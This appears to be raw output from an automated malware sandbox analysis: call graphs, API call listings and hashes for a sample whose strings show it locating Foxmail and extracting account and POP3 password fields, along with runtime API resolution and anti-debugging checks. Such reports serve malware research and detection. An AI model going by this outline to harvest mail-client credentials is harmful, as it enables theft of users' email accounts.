7763->7756 7765 3786a93e 7764->7765 7765->7756 7766 3786506f 7767 37865081 7766->7767 7768 37865087 7766->7768 7769 37865000 20 API calls 7767->7769 7769->7768 6617 378660ac 6619 378660b7 6617->6619 6620 378660dd 6617->6620 6618 378660c7 FreeLibrary 6618->6619 6619->6618 6619->6620 7139 3786742b 7142 37867430 7139->7142 7141 37867453 7142->7141 7143 37868bae 7142->7143 7144 37868bdd 7143->7144 7145 37868bbb 7143->7145 7144->7142 7146 37868bd7 7145->7146 7147 37868bc9 RtlDeleteCriticalSection 7145->7147 7148 3786571e _free 20 API calls 7146->7148 7147->7146 7147->7147 7148->7144 7770 3786ac6b 7771 3786ac84 __startOneArgErrorHandling 7770->7771 7773 3786acad __startOneArgErrorHandling 7771->7773 7774 3786b2f0 7771->7774 7775 3786b329 __startOneArgErrorHandling 7774->7775 7776 3786b5c1 __raise_exc RaiseException 7775->7776 7777 3786b350 __startOneArgErrorHandling 7775->7777 7776->7777 7778 3786b393 7777->7778 7779 3786b36e 7777->7779 7780 3786b8b2 __startOneArgErrorHandling 20 API calls 7778->7780 7785 3786b8e1 7779->7785 7782 3786b38e __startOneArgErrorHandling 7780->7782 7783 37862ada _ValidateLocalCookies 5 API calls 7782->7783 7784 3786b3b7 7783->7784 7784->7773 7786 3786b8f0 7785->7786 7787 3786b964 __startOneArgErrorHandling 7786->7787 7788 3786b90f __startOneArgErrorHandling 7786->7788 7789 3786b8b2 __startOneArgErrorHandling 20 API calls 7787->7789 7790 378678a3 __startOneArgErrorHandling 5 API calls 7788->7790 7793 3786b95d 7789->7793 7791 3786b950 7790->7791 7792 3786b8b2 __startOneArgErrorHandling 20 API calls 7791->7792 7791->7793 7792->7793 7793->7782 6621 37863eb3 6622 37865411 38 API calls 6621->6622 6623 37863ebb 6622->6623 7016 378663f0 7017 37866416 7016->7017 7018 37866400 7016->7018 7028 37866561 7017->7028 7030 37866480 7017->7030 7035 37866580 7017->7035 7019 37866368 __dosmaperr 20 API calls 7018->7019 7020 37866405 7019->7020 7022 378662ac _abort 26 API calls 7020->7022 7021 37864e76 20 API calls 7027 378664e5 7021->7027 7023 3786640f 7022->7023 7025 378664ee 7026 3786571e _free 20 API calls 7025->7026 7026->7028 7027->7025 7032 37866573 7027->7032 7046 378685eb 7027->7046 7055 3786679a 7028->7055 7030->7021 7033 378662bc _abort 11 API calls 7032->7033 7034 3786657f 7033->7034 7036 3786658c 7035->7036 7036->7036 7037 3786637b _abort 20 API calls 7036->7037 7038 378665ba 7037->7038 7039 378685eb 26 API calls 7038->7039 7040 378665e6 7039->7040 7041 378662bc _abort 11 API calls 7040->7041 7042 37866615 ___scrt_fastfail 7041->7042 7043 378666b6 FindFirstFileExA 7042->7043 7044 37866705 7043->7044 7045 37866580 26 API calls 7044->7045 7047 3786853a 7046->7047 7049 37868554 7047->7049 7051 3786854f 7047->7051 7053 3786858b 7047->7053 7048 37866368 __dosmaperr 20 API calls 7050 3786857a 7048->7050 7049->7027 7052 378662ac _abort 26 API calls 7050->7052 7051->7048 7051->7049 7052->7049 7053->7049 7054 37866368 __dosmaperr 20 API calls 7053->7054 7054->7050 7060 378667a4 7055->7060 7056 378667b4 7058 3786571e _free 20 API calls 7056->7058 7057 3786571e _free 20 API calls 7057->7060 7059 378667bb 7058->7059 7059->7023 7060->7056 7060->7057 7149 37865630 7150 3786563b 7149->7150 7151 37865eb7 11 API calls 7150->7151 7152 37865664 7150->7152 7154 37865660 7150->7154 7151->7150 7155 37865688 7152->7155 7156 378656b4 7155->7156 7157 37865695 7155->7157 7156->7154 7158 3786569f RtlDeleteCriticalSection 7157->7158 7158->7156 7158->7158 7794 37863370 7805 37863330 7794->7805 7806 37863342 7805->7806 7807 3786334f 7805->7807 7808 37862ada _ValidateLocalCookies 5 API calls 7806->7808 7808->7807 7809 37869e71 7810 37869e95 7809->7810 7811 37869eae 7810->7811 7813 3786ac6b __startOneArgErrorHandling 7810->7813 7812 3786aa53 21 API calls 7811->7812 7814 37869ef8 7811->7814 7812->7814 7815 3786b2f0 21 API calls 7813->7815 7816 3786acad __startOneArgErrorHandling 7813->7816 7815->7816 6628 378667bf 6633 378667f4 6628->6633 6631 378667db 6632 3786571e _free 20 API calls 6632->6631 6634 37866806 6633->6634 6643 378667cd 6633->6643 6635 37866836 6634->6635 6636 3786680b 6634->6636 6635->6643 6644 378671d6 6635->6644 6637 3786637b _abort 20 API calls 6636->6637 6638 37866814 6637->6638 6640 3786571e _free 20 API calls 6638->6640 6640->6643 6641 37866851 6642 3786571e _free 20 API calls 6641->6642 6642->6643 6643->6631 6643->6632 6645 378671e1 6644->6645 6646 37867209 6645->6646 6647 378671fa 6645->6647 6648 37867218 6646->6648 6653 37868a98 6646->6653 6649 37866368 __dosmaperr 20 API calls 6647->6649 6660 37868acb 6648->6660 6652 378671ff ___scrt_fastfail 6649->6652 6652->6641 6654 37868aa3 6653->6654 6655 37868ab8 RtlSizeHeap 6653->6655 6656 37866368 __dosmaperr 20 API calls 6654->6656 6655->6648 6657 37868aa8 6656->6657 6658 378662ac _abort 26 API calls 6657->6658 6659 37868ab3 6658->6659 6659->6648 6661 37868ae3 6660->6661 6662 37868ad8 6660->6662 6664 37868aeb 6661->6664 6670 37868af4 _abort 6661->6670 6663 378656d0 21 API calls 6662->6663 6669 37868ae0 6663->6669 6665 3786571e _free 20 API calls 6664->6665 6665->6669 6666 37868b1e RtlReAllocateHeap 6666->6669 6666->6670 6667 37868af9 6668 37866368 __dosmaperr 20 API calls 6667->6668 6668->6669 6669->6652 6670->6666 6670->6667 6671 3786474f _abort 7 API calls 6670->6671 6671->6670 7061 37865bff 7069 37865d5c 7061->7069 7064 37865c13 7065 37865b7a _abort 20 API calls 7066 37865c1b 7065->7066 7067 37865c28 7066->7067 7076 37865c2b 7066->7076 7070 37865c45 _abort 5 API calls 7069->7070 7071 37865d83 7070->7071 7072 37865d9b TlsAlloc 7071->7072 7073 37865d8c 7071->7073 7072->7073 7074 37862ada _ValidateLocalCookies 5 API calls 7073->7074 7075 37865c09 7074->7075 7075->7064 7075->7065 7077 37865c35 7076->7077 7078 37865c3b 7076->7078 7080 37865db2 7077->7080 7078->7064 7081 37865c45 _abort 5 API calls 7080->7081 7082 37865dd9 7081->7082 7083 37865df1 TlsFree 7082->7083 7084 37865de5 7082->7084 7083->7084 7085 37862ada _ValidateLocalCookies 5 API calls 7084->7085 7086 37865e02 7085->7086 7086->7078 7159 37861f3f 7160 37861f4b ___DestructExceptionObject 7159->7160 7177 3786247c 7160->7177 7162 37861f52 7163 37862041 7162->7163 7164 37861f7c 7162->7164 7171 37861f57 ___scrt_is_nonwritable_in_current_image 7162->7171 7200 37862639 IsProcessorFeaturePresent 7163->7200 7188 378623de 7164->7188 7167 37862048 7168 37861f8b __RTC_Initialize 7168->7171 7191 378622fc RtlInitializeSListHead 7168->7191 7170 37861f99 ___scrt_initialize_default_local_stdio_options 7192 378646c5 7170->7192 7175 37861fb8 7175->7171 7176 37864669 _abort 5 API calls 7175->7176 7176->7171 7178 37862485 7177->7178 7204 37862933 IsProcessorFeaturePresent 7178->7204 7182 37862496 7183 3786249a 7182->7183 7215 378653c8 7182->7215 7183->7162 7186 378624b1 7186->7162 7271 378624b5 7188->7271 7190 378623e5 7190->7168 7191->7170 7195 378646dc 7192->7195 7193 37862ada _ValidateLocalCookies 5 API calls 7194 37861fad 7193->7194 7194->7171 7196 378623b3 7194->7196 7195->7193 7197 378623b8 ___scrt_release_startup_lock 7196->7197 7198 37862933 ___isa_available_init IsProcessorFeaturePresent 7197->7198 7199 378623c1 7197->7199 7198->7199 7199->7175 7201 3786264e ___scrt_fastfail 7200->7201 7202 378626f9 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 7201->7202 7203 37862744 ___scrt_fastfail 7202->7203 7203->7167 7205 37862491 7204->7205 7206 378634ea 7205->7206 7207 378634ef ___vcrt_initialize_winapi_thunks 7206->7207 7226 37863936 7207->7226 7211 37863505 7212 37863510 7211->7212 7240 37863972 7211->7240 7212->7182 7214 378634fd 7214->7182 7263 37867457 7215->7263 7218 37863529 7219 37863543 7218->7219 7220 37863532 7218->7220 7219->7183 7221 3786391b ___vcrt_uninitialize_ptd 6 API calls 7220->7221 7222 37863537 7221->7222 7223 37863972 ___vcrt_uninitialize_locks RtlDeleteCriticalSection 7222->7223 7224 3786353c 7223->7224 7267 37863c50 7224->7267 7228 3786393f 7226->7228 7229 37863968 7228->7229 7230 378634f9 7228->7230 7244 37863be0 7228->7244 7231 37863972 ___vcrt_uninitialize_locks RtlDeleteCriticalSection 7229->7231 7230->7214 7232 378638e8 7230->7232 7231->7230 7249 37863af1 7232->7249 7235 378638fd 7235->7211 7236 37863ba2 ___vcrt_FlsSetValue 6 API calls 7237 3786390b 7236->7237 7238 37863918 7237->7238 7254 3786391b 7237->7254 7238->7211 7241 3786399c 7240->7241 7242 3786397d 7240->7242 7241->7214 7243 37863987 RtlDeleteCriticalSection 7242->7243 7243->7241 7243->7243 7245 37863a82 try_get_function 5 API calls 7244->7245 7246 37863bfa 7245->7246 7247 37863c18 InitializeCriticalSectionAndSpinCount 7246->7247 7248 37863c03 7246->7248 7247->7248 7248->7228 7250 37863a82 try_get_function 5 API calls 7249->7250 7251 37863b0b 7250->7251 7252 37863b24 TlsAlloc 7251->7252 7253 378638f2 7251->7253 7253->7235 7253->7236 7255 37863925 7254->7255 7256 3786392b 7254->7256 7258 37863b2c 7255->7258 7256->7235 7259 37863a82 try_get_function 5 API calls 7258->7259 7260 37863b46 7259->7260 7261 37863b5e TlsFree 7260->7261 7262 37863b52 7260->7262 7261->7262 7262->7256 7266 37867470 7263->7266 7264 37862ada _ValidateLocalCookies 5 API calls 7265 378624a3 7264->7265 7265->7186 7265->7218 7266->7264 7268 37863c59 7267->7268 7270 37863c7f 7267->7270 7269 37863c69 FreeLibrary 7268->7269 7268->7270 7269->7268 7270->7219 7272 378624c4 7271->7272 7273 378624c8 7271->7273 7272->7190 7274 37862639 ___scrt_fastfail 4 API calls 7273->7274 7276 378624d5 ___scrt_release_startup_lock 7273->7276 7275 37862559 7274->7275 7276->7190 7277 3786543d 7278 37865440 7277->7278 7279 378655a8 _abort 38 API calls 7278->7279 7280 3786544c 7279->7280

                                                                                      Control-flow Graph

                                                                                      APIs
                                                                                      • lstrlenW.KERNEL32(?,?,?,?,00000002,00000000), ref: 37861137
                                                                                      • lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,00000002,00000000), ref: 37861151
                                                                                      • lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 3786115C
                                                                                      • lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 3786116D
                                                                                      • lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 3786117C
                                                                                      • FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,?,00000002,00000000), ref: 37861193
                                                                                      • FindNextFileW.KERNELBASE(00000000,00000010), ref: 378611D0
                                                                                      • FindClose.KERNEL32(00000000), ref: 378611DB
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.4484797766.0000000037861000.00000040.00001000.00020000.00000000.sdmp, Offset: 37860000, based on PE: true
                                                                                      • Associated: 00000004.00000002.4484769494.0000000037860000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.4484797766.0000000037876000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_37860000_LrBF2Z930N.jbxd
                                                                                      Similarity
                                                                                      • API ID: lstrlen$Find$File$CloseFirstNextlstrcat
                                                                                      • String ID:
                                                                                      • API String ID: 1083526818-0
                                                                                      • Opcode ID: a70a84678f3a8bd72224d93b3407a0af42b806e838d395b44ebdbe63ff892644
                                                                                      • Instruction ID: 9fbcb9c06c235c9bdc9b1a0194769ff827378a8296143b90242a4eb18746f7d0
                                                                                      • Opcode Fuzzy Hash: a70a84678f3a8bd72224d93b3407a0af42b806e838d395b44ebdbe63ff892644
                                                                                      • Instruction Fuzzy Hash: 002187719443487BD710EF649C4DF9B7B9CEF54728F00092AF698E3190E774D60587A6

                                                                                      Control-flow Graph

                                                                                      APIs
                                                                                      • GetEnvironmentVariableW.KERNEL32(ProgramFiles,?,00000104), ref: 37861434
                                                                                        • Part of subcall function 378610F1: lstrlenW.KERNEL32(?,?,?,?,00000002,00000000), ref: 37861137
                                                                                        • Part of subcall function 378610F1: lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,00000002,00000000), ref: 37861151
                                                                                        • Part of subcall function 378610F1: lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 3786115C
                                                                                        • Part of subcall function 378610F1: lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 3786116D
                                                                                        • Part of subcall function 378610F1: lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 3786117C
                                                                                        • Part of subcall function 378610F1: FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,?,00000002,00000000), ref: 37861193
                                                                                        • Part of subcall function 378610F1: FindNextFileW.KERNELBASE(00000000,00000010), ref: 378611D0
                                                                                        • Part of subcall function 378610F1: FindClose.KERNEL32(00000000), ref: 378611DB
                                                                                      • lstrlenW.KERNEL32(?), ref: 378614C5
                                                                                      • lstrlenW.KERNEL32(?), ref: 378614E0
                                                                                      • lstrlenW.KERNEL32(?,?), ref: 3786150F
                                                                                      • lstrcatW.KERNEL32(00000000), ref: 37861521
                                                                                      • lstrlenW.KERNEL32(?,?), ref: 37861547
                                                                                      • lstrcatW.KERNEL32(00000000), ref: 37861553
                                                                                      • lstrlenW.KERNEL32(?,?), ref: 37861579
                                                                                      • lstrcatW.KERNEL32(00000000), ref: 37861585
                                                                                      • lstrlenW.KERNEL32(?,?), ref: 378615AB
                                                                                      • lstrcatW.KERNEL32(00000000), ref: 378615B7
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.4484797766.0000000037861000.00000040.00001000.00020000.00000000.sdmp, Offset: 37860000, based on PE: true
                                                                                      • Associated: 00000004.00000002.4484769494.0000000037860000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.4484797766.0000000037876000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_37860000_LrBF2Z930N.jbxd
                                                                                      Similarity
                                                                                      • API ID: lstrlen$lstrcat$Find$File$CloseEnvironmentFirstNextVariable
                                                                                      • String ID: )$Foxmail$ProgramFiles
                                                                                      • API String ID: 672098462-2938083778
                                                                                      • Opcode ID: c1a0d4db30099badd4db53b6387f88e2ae558e899171fa72761ed15c6823ca9d
                                                                                      • Instruction ID: a5d31897d3febd689913fb3ef4bf1dfcf1c12cb8e73f06182c54fa67490092c4
                                                                                      • Opcode Fuzzy Hash: c1a0d4db30099badd4db53b6387f88e2ae558e899171fa72761ed15c6823ca9d
                                                                                      • Instruction Fuzzy Hash: 7581F171E10358B9DB20DBA4DC49FEE7338EF84714F1005A6FA08E7180EA755A84CF96

                                                                                      Control-flow Graph

                                                                                      APIs
                                                                                      • GetModuleHandleA.KERNEL32(3786C7DD), ref: 3786C7E6
                                                                                      • GetModuleHandleA.KERNEL32(?,3786C7DD), ref: 3786C838
                                                                                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 3786C860
                                                                                        • Part of subcall function 3786C803: GetProcAddress.KERNEL32(00000000,3786C7F4), ref: 3786C804
                                                                                        • Part of subcall function 3786C803: VirtualProtect.KERNEL32(?,00000078,00000004,?,00000000,00000000,3786C7F4,3786C7DD), ref: 3786C816
                                                                                        • Part of subcall function 3786C803: VirtualProtect.KERNEL32(?,00000078,?,?,?,00000000,00000000,3786C7F4,3786C7DD), ref: 3786C82A
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.4484797766.0000000037861000.00000040.00001000.00020000.00000000.sdmp, Offset: 37860000, based on PE: true
                                                                                      • Associated: 00000004.00000002.4484769494.0000000037860000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.4484797766.0000000037876000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_37860000_LrBF2Z930N.jbxd
                                                                                      Similarity
                                                                                      • API ID: AddressHandleModuleProcProtectVirtual
                                                                                      • String ID:
                                                                                      • API String ID: 2099061454-0
                                                                                      • Opcode ID: 18a205e926d3f8c1bd8ceb8f3c836a0ea39c7540959748e6d39d93322aab4e9f
                                                                                      • Instruction ID: c53ac1385a04fa49894a59db4b90b67f679c5371053194b828c5a14c49d6c9c9
                                                                                      • Opcode Fuzzy Hash: 18a205e926d3f8c1bd8ceb8f3c836a0ea39c7540959748e6d39d93322aab4e9f
                                                                                      • Instruction Fuzzy Hash: C201006094534038BA315A780C0DEBA6FD89B37EBCB500656A320C6193CAA8B50283F6

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 79 3786c7a7-3786c7bc 80 3786c7be-3786c7c6 79->80 81 3786c82d 79->81 80->81 82 3786c7c8-3786c7f6 call 3786c7e6 80->82 83 3786c82f-3786c833 81->83 91 3786c86c-3786c86e 82->91 92 3786c7f8 82->92 85 3786c835-3786c83d GetModuleHandleA 83->85 86 3786c872 call 3786c877 83->86 87 3786c83f-3786c847 85->87 87->87 90 3786c849-3786c84c 87->90 90->83 93 3786c84e-3786c850 90->93 96 3786c866-3786c86b 91->96 97 3786c870 91->97 94 3786c7fa-3786c7fe 92->94 95 3786c85b-3786c85e 92->95 98 3786c856-3786c85a 93->98 99 3786c852-3786c854 93->99 102 3786c865 94->102 103 3786c800-3786c80b GetProcAddress 94->103 100 3786c85f-3786c860 GetProcAddress 95->100 96->91 97->90 98->95 99->100 100->102 102->96 103->81 104 3786c80d-3786c81a VirtualProtect 103->104 105 3786c82c 104->105 106 3786c81c-3786c82a VirtualProtect 104->106 105->81 106->105
                                                                                      APIs
                                                                                      • GetModuleHandleA.KERNEL32(?,3786C7DD), ref: 3786C838
                                                                                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 3786C860
                                                                                        • Part of subcall function 3786C7E6: GetModuleHandleA.KERNEL32(3786C7DD), ref: 3786C7E6
                                                                                        • Part of subcall function 3786C7E6: GetProcAddress.KERNEL32(00000000,3786C7F4), ref: 3786C804
                                                                                        • Part of subcall function 3786C7E6: VirtualProtect.KERNEL32(?,00000078,00000004,?,00000000,00000000,3786C7F4,3786C7DD), ref: 3786C816
                                                                                        • Part of subcall function 3786C7E6: VirtualProtect.KERNEL32(?,00000078,?,?,?,00000000,00000000,3786C7F4,3786C7DD), ref: 3786C82A
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.4484797766.0000000037861000.00000040.00001000.00020000.00000000.sdmp, Offset: 37860000, based on PE: true
                                                                                      • Associated: 00000004.00000002.4484769494.0000000037860000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.4484797766.0000000037876000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_37860000_LrBF2Z930N.jbxd
                                                                                      Similarity
                                                                                      • API ID: AddressHandleModuleProcProtectVirtual
                                                                                      • String ID:
                                                                                      • API String ID: 2099061454-0
                                                                                      • Opcode ID: 731a18adefd9f684ec9123585341c8004b06a9316977ab842e52f252e525921e
                                                                                      • Instruction ID: 2c2b5b2b4274e661e8fd06b998515a3fefa1b24f6c28801b2e23c40728dcacd8
                                                                                      • Opcode Fuzzy Hash: 731a18adefd9f684ec9123585341c8004b06a9316977ab842e52f252e525921e
                                                                                      • Instruction Fuzzy Hash: A92105754082817EF7318E784C0DBA66FD89B37AB8F180696D250CB143D6A8B445C3E2

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 107 3786c803-3786c80b GetProcAddress 108 3786c82d 107->108 109 3786c80d-3786c81a VirtualProtect 107->109 112 3786c82f-3786c833 108->112 110 3786c82c 109->110 111 3786c81c-3786c82a VirtualProtect 109->111 110->108 111->110 113 3786c835-3786c83d GetModuleHandleA 112->113 114 3786c872 call 3786c877 112->114 115 3786c83f-3786c847 113->115 115->115 117 3786c849-3786c84c 115->117 117->112 118 3786c84e-3786c850 117->118 119 3786c856-3786c85e 118->119 120 3786c852-3786c854 118->120 121 3786c85f-3786c865 GetProcAddress 119->121 120->121 124 3786c866-3786c86e 121->124 126 3786c870 124->126 126->117
                                                                                      APIs
                                                                                      • GetProcAddress.KERNEL32(00000000,3786C7F4), ref: 3786C804
                                                                                      • VirtualProtect.KERNEL32(?,00000078,00000004,?,00000000,00000000,3786C7F4,3786C7DD), ref: 3786C816
                                                                                      • VirtualProtect.KERNEL32(?,00000078,?,?,?,00000000,00000000,3786C7F4,3786C7DD), ref: 3786C82A
                                                                                      • GetModuleHandleA.KERNEL32(?,3786C7DD), ref: 3786C838
                                                                                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 3786C860
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.4484797766.0000000037861000.00000040.00001000.00020000.00000000.sdmp, Offset: 37860000, based on PE: true
                                                                                      • Associated: 00000004.00000002.4484769494.0000000037860000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.4484797766.0000000037876000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_37860000_LrBF2Z930N.jbxd
                                                                                      Similarity
                                                                                      • API ID: AddressProcProtectVirtual$HandleModule
                                                                                      • String ID:
                                                                                      • API String ID: 2152742572-0
                                                                                      • Opcode ID: f81dfe0726a7f77e278230a0c4648d339da411b55a21776b762b5ef698216b3c
                                                                                      • Instruction ID: 4bd618612e27fcf806768edab7ae04b5b37f41fc8e6238b51057845226ada4f6
                                                                                      • Opcode Fuzzy Hash: f81dfe0726a7f77e278230a0c4648d339da411b55a21776b762b5ef698216b3c
                                                                                      • Instruction Fuzzy Hash: 00F0F6A55453403CFA7149B80C4DEBA5FCC8B37EB9B101A56E314C7183D999B50683F6
                                                                                      APIs
                                                                                      • IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 378661DA
                                                                                      • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 378661E4
                                                                                      • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,00000000), ref: 378661F1
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.4484797766.0000000037861000.00000040.00001000.00020000.00000000.sdmp, Offset: 37860000, based on PE: true
                                                                                      • Associated: 00000004.00000002.4484769494.0000000037860000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.4484797766.0000000037876000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_37860000_LrBF2Z930N.jbxd
                                                                                      Similarity
                                                                                      • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                                      • String ID:
                                                                                      • API String ID: 3906539128-0
                                                                                      • Opcode ID: 7d89320b4e0bd6bb25df21811a18718b7028687a39591ed6503b859bad44e8f0
                                                                                      • Instruction ID: acfa71f05afc599e81fdc652a612791ff4316094b6d0d7b0a8b1a616ed07ca2e
                                                                                      • Opcode Fuzzy Hash: 7d89320b4e0bd6bb25df21811a18718b7028687a39591ed6503b859bad44e8f0
                                                                                      • Instruction Fuzzy Hash: 8F31E87494121CABCB21DF28D988BCDBBB4FF18314F5041DAE91CA7250EB349B858F55
                                                                                      APIs
                                                                                      • GetCurrentProcess.KERNEL32(?,?,37864A8A,?,37872238,0000000C,37864BBD,00000000,00000000,?,37862082,37872108,0000000C,37861F3A,?), ref: 37864AD5
                                                                                      • TerminateProcess.KERNEL32(00000000,?,37864A8A,?,37872238,0000000C,37864BBD,00000000,00000000,?,37862082,37872108,0000000C,37861F3A,?), ref: 37864ADC
                                                                                      • ExitProcess.KERNEL32 ref: 37864AEE
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.4484797766.0000000037861000.00000040.00001000.00020000.00000000.sdmp, Offset: 37860000, based on PE: true
                                                                                      • Associated: 00000004.00000002.4484769494.0000000037860000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.4484797766.0000000037876000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_37860000_LrBF2Z930N.jbxd
                                                                                      Similarity
                                                                                      • API ID: Process$CurrentExitTerminate
                                                                                      • String ID:
                                                                                      • API String ID: 1703294689-0
                                                                                      • Opcode ID: 92702354aa7e3a8aae831a11d769389652e4e991ab8d47b16f84d8853111a091
                                                                                      • Instruction ID: 4fbddbf6468e89d11a57673a88755d47deebdba6720ebe30f4e71cd5764e8060
                                                                                      • Opcode Fuzzy Hash: 92702354aa7e3a8aae831a11d769389652e4e991ab8d47b16f84d8853111a091
                                                                                      • Instruction Fuzzy Hash: 6FE01A35000144BFCF01BF55C90DB8D3F29AB10359B004010FB1876021CB39D943DB55
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.4484797766.0000000037861000.00000040.00001000.00020000.00000000.sdmp, Offset: 37860000, based on PE: true
                                                                                      • Associated: 00000004.00000002.4484769494.0000000037860000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.4484797766.0000000037876000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_37860000_LrBF2Z930N.jbxd
                                                                                      Similarity
                                                                                      • API ID: HeapProcess
                                                                                      • String ID:
                                                                                      • API String ID: 54951025-0
                                                                                      • Opcode ID: 88611b1028e8d44dac80802ed7652c542950a1f292063fc7170ca377d1582a76
                                                                                      • Instruction ID: bdc7aec18c81587f6faa1193c957e17a6add7549cdc0ac4c573dbceebe2bf547
                                                                                      • Opcode Fuzzy Hash: 88611b1028e8d44dac80802ed7652c542950a1f292063fc7170ca377d1582a76
                                                                                      • Instruction Fuzzy Hash: B9A01130280282AF8B008E30830F30C3EACAA082C83000028AA0AF0000EB2880028A03

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 136 3786173a-378617fe call 3786c030 call 37862c40 * 2 143 37861803 call 37861cca 136->143 144 37861808-3786180c 143->144 145 37861812-37861816 144->145 146 378619ad-378619b1 144->146 145->146 147 3786181c-37861837 call 37861ede 145->147 150 3786199f-378619ac call 37861ee7 * 2 147->150 151 3786183d-37861845 147->151 150->146 152 37861982-37861985 151->152 153 3786184b-3786184e 151->153 155 37861987 152->155 156 37861995-37861999 152->156 153->152 157 37861854-37861881 call 378644b0 * 2 call 37861db7 153->157 159 3786198a-3786198d call 37862c40 155->159 156->150 156->151 170 37861887-3786189f call 378644b0 call 37861db7 157->170 171 3786193d-37861943 157->171 165 37861992 159->165 165->156 170->171 187 378618a5-378618a8 170->187 173 37861945-37861947 171->173 174 3786197e-37861980 171->174 173->174 176 37861949-3786194b 173->176 174->159 178 37861961-3786197c call 378616aa 176->178 179 3786194d-3786194f 176->179 178->165 182 37861955-37861957 179->182 183 37861951-37861953 179->183 184 3786195d-3786195f 182->184 185 37861959-3786195b 182->185 183->178 183->182 184->174 184->178 185->178 185->184 188 378618c4-378618dc call 378644b0 call 37861db7 187->188 189 378618aa-378618c2 call 378644b0 call 37861db7 187->189 188->156 198 378618e2-3786193b call 378616aa call 378615da call 37862c40 * 2 188->198 189->188 189->198 198->156
                                                                                      APIs
                                                                                        • Part of subcall function 37861CCA: CopyFileW.KERNEL32(?,?,00000000,?,?,?,?,?,?,00000000), ref: 37861D1B
                                                                                        • Part of subcall function 37861CCA: CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000080,00000000,?,?,00000000), ref: 37861D37
                                                                                        • Part of subcall function 37861CCA: DeleteFileW.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 37861D4B
                                                                                      • _strlen.LIBCMT ref: 37861855
                                                                                      • _strlen.LIBCMT ref: 37861869
                                                                                      • _strlen.LIBCMT ref: 3786188B
                                                                                      • _strlen.LIBCMT ref: 378618AE
                                                                                      • _strlen.LIBCMT ref: 378618C8
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.4484797766.0000000037861000.00000040.00001000.00020000.00000000.sdmp, Offset: 37860000, based on PE: true
                                                                                      • Associated: 00000004.00000002.4484769494.0000000037860000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.4484797766.0000000037876000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_37860000_LrBF2Z930N.jbxd
                                                                                      Similarity
                                                                                      • API ID: _strlen$File$CopyCreateDelete
                                                                                      • String ID: Acco$Acco$POP3$POP3$Pass$Pass$t$t$un$un$word$word
                                                                                      • API String ID: 3296212668-3023110444
                                                                                      • Opcode ID: 6f2763eb29f99e55b9fa1c4501e1124463a6139b8cfee53aa49ae728a3ea04e1
